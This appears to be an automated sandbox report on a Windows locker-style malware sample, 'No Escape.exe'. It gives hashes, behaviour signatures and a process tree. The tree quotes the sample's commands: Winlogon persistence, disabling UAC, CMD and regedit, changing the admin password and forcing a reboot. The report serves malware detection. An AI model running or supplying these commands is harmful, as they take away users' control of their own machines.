Resubmissions

11-07-2024 18:37

240711-w9z6ms1gmc 10

11-07-2024 08:47

240711-kp9zkayfjn 10

Analysis

  • max time kernel
    9s
  • max time network
    10s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    11-07-2024 08:47

Errors

Reason
Machine shutdown

General

  • Target

    NO-ESCAPE-main/No Escape.exe

  • Size

    771KB

  • MD5

    2782877418b44509fd306fd9afe43e39

  • SHA1

    b0c18bdf782ca9c4fa41074f05458ce8e0f3961b

  • SHA256

    56d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b

  • SHA512

    8826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86

  • SSDEEP

    24576:OeTrmlZGPL7NV9+VitFsQUxY8BGOdQSqZ:hT6KDrmIFsBJBG4XqZ

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NO-ESCAPE-main\No Escape.exe
    "C:\Users\Admin\AppData\Local\Temp\NO-ESCAPE-main\No Escape.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\system32\wscript.exe
      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\B71F.tmp\B720.tmp\B721.vbs //Nologo
      2⤵
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Program Files (x86)\hello.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\msg.exe
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2760
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\launch.exe
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2728
        • C:\Windows\regedit.exe
          regedit /s hello.reg
          4⤵
          • Runs .reg file with regedit
          PID:2736
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
          4⤵
            PID:2084
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
            4⤵
            • Modifies WinLogon for persistence
            PID:2984
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
            4⤵
            • Sets desktop wallpaper using registry
            PID:2880
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
            4⤵
              PID:2764
            • C:\Windows\system32\reg.exe
              reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • UAC bypass
              PID:2856
            • C:\Windows\system32\reg.exe
              reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
              4⤵
                PID:2636
              • C:\Windows\system32\reg.exe
                REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                4⤵
                • Disables RegEdit via registry modification
                • Modifies registry key
                PID:2872
              • C:\Windows\system32\net.exe
                net user Admin death
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2628
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user Admin death
                  5⤵
                    PID:2900
                • C:\Windows\system32\shutdown.exe
                  shutdown /t 0 /r
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2648
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x0
            1⤵
              PID:2632
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x1
              1⤵
                PID:1444

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files (x86)\date.txt

                Filesize

                120B

                MD5

                255a8e245b6ad378558b90cbe3dbc3d0

                SHA1

                6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

                SHA256

                d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

                SHA512

                67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

              • C:\Program Files (x86)\hello.bat

                Filesize

                1KB

                MD5

                b86fddd2b764f079615be5d4dc3e158d

                SHA1

                2510479054db1fe52cc2dcd3c7033d91204cb367

                SHA256

                2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

                SHA512

                915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

              • C:\Program Files (x86)\hello.jpg

                Filesize

                110KB

                MD5

                057ea45c364eb2994808a47b118556a2

                SHA1

                1d48c9c15ea5548af1475b5a369a4f7b8db42858

                SHA256

                6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

                SHA512

                582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

              • C:\Program Files (x86)\hello.reg

                Filesize

                3KB

                MD5

                81427e9d5d10657b9edffd22e7b405bb

                SHA1

                f27ab62f77f827dbb32c66a35ac48006c47f4374

                SHA256

                bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

                SHA512

                b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

              • C:\Program Files (x86)\launch.exe

                Filesize

                92KB

                MD5

                b4acc41d0e55b299ffeec11a8a20cf08

                SHA1

                bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

                SHA256

                34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

                SHA512

                d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

              • C:\Program Files (x86)\msg.exe

                Filesize

                9KB

                MD5

                331a0667b11e02330357565427dc1175

                SHA1

                d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

                SHA256

                fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

                SHA512

                1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

              • C:\Users\Admin\AppData\Local\Temp\B71F.tmp\B720.tmp\B721.vbs

                Filesize

                588B

                MD5

                67706bca9ceaba11530e05d351487003

                SHA1

                3a5ed77f81b14093a5f18c4d46895bc7ea770fee

                SHA256

                190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

                SHA512

                902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598